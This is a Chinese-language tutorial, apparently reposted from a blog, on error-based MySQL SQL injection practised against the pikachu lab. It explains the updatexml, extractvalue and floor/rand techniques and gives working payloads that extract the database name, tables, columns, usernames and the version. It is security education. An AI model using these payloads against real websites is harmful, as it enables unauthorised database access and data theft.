自学内容网 自学内容网
自学内容网 > 正文

SQL Inject-基于报错的信息获取

🕗 发布于 2024-10-04 12:49 sql  数据库  

常用的用来报错的函数
updatexml() :   函数是MYSQL对XML文档数据进行查询和修改的XPATH函数。
extractvalue(): 函数也是MYSQL对XML文档数据进行查询的XPATH函数。
floor():             MYSQL中用来取整的函数。

思路:

在MySQL中使用一些指定的函数来制造报错,从而从报错信息中获取设定的信息。select / insert / update / delete 都可以使用报错来获取信息。

前提条件是后台没有屏蔽数据库报错信息,在语法发生错误时,会输出到前端。

updatexml()
Updatexm()函数作用: 改变(查找并替换) XML文档中符合条件的节点的值。
语法: UPDATEXML (xml document, XPathstring, new_value)

第一个参数: fiedname是String格式,为表中的字段名。
第二个参数: XPathstring (Xpath格式的字符串)。
第三个参数: new. value,String格式,替换查找到的符合条件的

Xpath定位必须是有效的,否则会发生错误。 

pikachu - 字符型注入(GET) 实验:

aa' and updatexml(1,concat(0x7e,database()),0)#

// 0x7e  是 ~ 的十六进制 ,避免报错信息被吃掉;

如果没有concat ,而是aa' and updatexml(1,database(),0)#   

这样报错信息会少一部分,没法完全展示;

获取到了数据库名称 pikachu,我们可以把 database() 替换成任意我们想要获得的东西。

得到数据库名称后,根据数据库名,查询表名

aa' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = 'pikachu')),0)#
// 中间的select 语句要用() 括号括起来

//查询报多于一行
aa' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = 'pikachu' limit 1)),0)#

使用上述语句,查到第一张表名;继续使用limit 1,1   或 limit 2,1 查询下去,可以把所有的表名查询出来; 或者burp suite  参数化查询把所有表查出来。

得到表名后,可以根据表名查询字段名

aa' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name = 'users' limit 0,1)),0)#

得到所有列名。可以根据列名获取数据

aa' and updatexml(1,concat(0x7e,(select username from users limit 0,1)),0)#


extractvalue()

extractvalue()函数作用:从目标XML中返回包含所查询值的字符串。
语法: ExtractValue(xm| _document, xpath. string)

第一个参数: XML document是String格式,为XML文档对象的名称,文中为Doc
第二个参数: XPath_ string (Xpath格式的字符串)

Xpath定位必须是有效的,否则会发生错误。
打开字符型注入,输入payload。

aa' and extractvalue(0,concat(0x7e,version()))#


效果差不多,理解以此类推即可。

floor()

原因:floor()报错注入的原因是 groupby 在向临时表插入数据时,由于rand()多次计算导致插入临时表时主键重复,从而报错,又因为报错前 concat()中的SQL语句或函数被执行,所以该语句报错且被抛出的主键是SQL语句或数执行后的结果。

floor()函数:对传入的值进行向下取整操作,并返回结果,如floor(1.999),则返回1 ;

rand()函数,返回随机数

rand(x)函数,x在这里代表参数,当rand()函数有了参数后,生成的就是伪随机数,什么意思呢?比如你使用rand(0)产生的第一个随机数产生的随机数相同,也就是当rand(x)这个参数x已知的时候我们就能知道;

在字符型中输入payload得到版本号。

aa' and (select 2 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)#


 


原文地址:https://blog.csdn.net/guanrongl/article/details/142694087

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!

相关文章

自学内容网
Copyright © 2015-2024